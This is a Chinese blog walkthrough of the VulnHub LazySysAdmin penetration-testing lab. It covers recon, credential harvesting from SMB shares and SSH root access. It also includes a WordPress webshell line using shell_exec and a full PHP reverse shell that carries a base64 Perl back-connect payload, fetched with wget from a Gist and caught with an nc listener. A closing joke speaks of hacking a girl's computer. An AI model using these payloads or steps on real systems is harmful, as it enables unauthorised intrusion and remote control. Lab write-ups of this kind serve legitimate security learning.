带妹玩转vulnhub(一)

2019-07-25 16:08:41 浏览数 (1)

前言

题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。

带妹是不可能带妹的,这辈子都不可能带妹的?

开始

下载

我们首先需要下载LazySysAdmin的虚拟镜像,这里 但是打开之后是ovf mf vmdk三种格式的文件,刚开始比较懵,不知道用什么虚拟机打开,于是上网找了一点相关资料 也就是说需要用VMware打开

基本配置

其实这个环境不需要怎么配置,只需设置好网络连接方式即可,使其和我们的攻击机在同一个局域网中。

渗透测试

ip扫描

我这里使用的攻击机为kali。 首先使用netdiscover进行主机发现,当然使用nmap也可以,但是速度稍微有点慢,况且第一步以扫描ip为主。

根据mac地址和现有的已知信息,可以得到ip:192.168.43.167

端口扫描

nmap -A 192.168.43.160

从中可以得到很多有用的信息

很明显可以看出来是一个windows操作系统,并且开启了SSH,Mysql,InsplRCd,Smb等服务。 先是登上网站看看有没有什么发现. 在kali下使用DirBuster进行目录扫描,对于我这种菜?,连怎么配置都百度了一番参考链接

我这里的配置如下图

最后扫描结果

可以很明显的看到有phpmyadmin和wordpress 尝试爆破phpMyadmin的口令

开始

使用WpScan进行扫描

使用WpScan扫描wordpress,我也不会用,所以还是放上一个参考链接

wpscan --url http://192.168.43.167/wordpress --enumerate u

最后也仅仅只是知道了一个用户名为admin

使用enum4linux进行扫描

因为远程主机开启了445和irc服务,这都是用于windows和linux进行通信的服务。 enum4linux 192.168.43.167 主要的信息如下

InspIRCd登陆

首先让我们了解一下InspIRCd是什么东西。

InspIRCd是一款现代化,快速的IRC服务器,也是少数几个IRC服务器应用程序之一,可提供高性能和稳定性,并以C 编写。 它是在您的服务器上构建自己的IRC的最佳解决方案之一。 它支持两个加密库,OpenSSL和gnutls,并支持许多服务,如anope主题。 InspIRCd基于提供许多模块的模块化IRCd。 如果要在InspIRCd上启用模块,则只需编辑modules.conf文件,并为模块添加新行。

以上内容来自此处 我们只需在kali下安装其客户端即可,

irssi /connect 192.168.43.167 6667 123 root建立链接

smb协议登陆

可以知道远程主机共享了print share两个文件夹,用户名为KAZYSYSADMIN并且密码很可能是5位数。接下来可以使用smb协议进行访问共享文件。 可以采用三种方式访问smb服务,参考链接 最后成功的访问到了share文件夹,可以看到这就是网站的源代码

获取信息

通常我们会查看一些配置文件,很明显现在我们获得到了关键的信息

而且通常来说MySql的用户名密码也就是phpMyAdmin的密码 尝试登陆phpMyAdmin,但是并没有什么发现

ssh登陆

这时候回想一下我们所收集到的信息,还有一个ssh没有使用,并且有一个12345这样的密码,所以尝试ssh登陆。 ssh togie@192.168.43.167

发现有sudo的权限,切换为root用户,最后得到对应的信息。

结束?

其实到这里已经可以结束了,但是我看网上一些文章中还有另一种办法,没想到ssh的用户名密码在wordpress中同样的适用,所以在渗透测试时,要将手中的信息都进行测试,用户往往会采用相同的用户名和密码。

方法二

虽然我们在phpmyadmin中无法操作,但是wordpress同样可以尝试进行登陆。 现在有必要罗列一下我们手中所拥有的信息了。

未知的密码12345

未知的用户名togie

数据库的用户名Admin,密码TogieMYSQL12345^^

两两结合进行测试,很快便可以试出用户名和密码 对于web我真的是一窍不通,就算拿到了wordpress的控制面板,我也不知道该如何上传shell,只能照着网上的文章一步一步的照做了。 我通过Gist创建了一个反向shell,并对本地端口进行监听。

第一步执行命令回显

// And then randomly choose a line $lyrics = "<pre>".shell_exec($_GET['cmd'])."</pre>"; return wptexturize($lyrics);

这段代码的作用就是使其可以命令执行(来自一位小菜的解释) 特地上网百度了一番RCE是远程代码执行的意思? 找到一个可以访问的php,然后写上shell就可以了。。?

真的很小白

第二步上传反向shell

<?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } $yourip = "192.168.43.93"; //修改这里 $yourport = "2333"; // 修改这里 $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; cf('/tmp/.bc',$back_connect); $res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); ?>

网上找的反向shell的小马

192.168.43.167/wordpress/wp-admin/index.php?cmd=wget https://gist.githubusercontent.com/jsk2017/b6f4eb6dc6a8250d16f34d4cdbd42eb7/raw/66ba2bb4dd08304aeace90ce2389bddb0d0d36c6/rev.php

第三步访问指定的网址

访问 192.168.43.167/wordpress/wp-admin/rev.php便可以拿到shell 本地通过

nc -lnvp 2333

进行监听

总结

今天先是简单认识了一下VulnHub的使用,也学到了很多渗透测试工具?,接下来让我们一起面对更加真实的世界!

带妹是不可能带妹的,不过黑妹子电脑?才是王道!

0 人点赞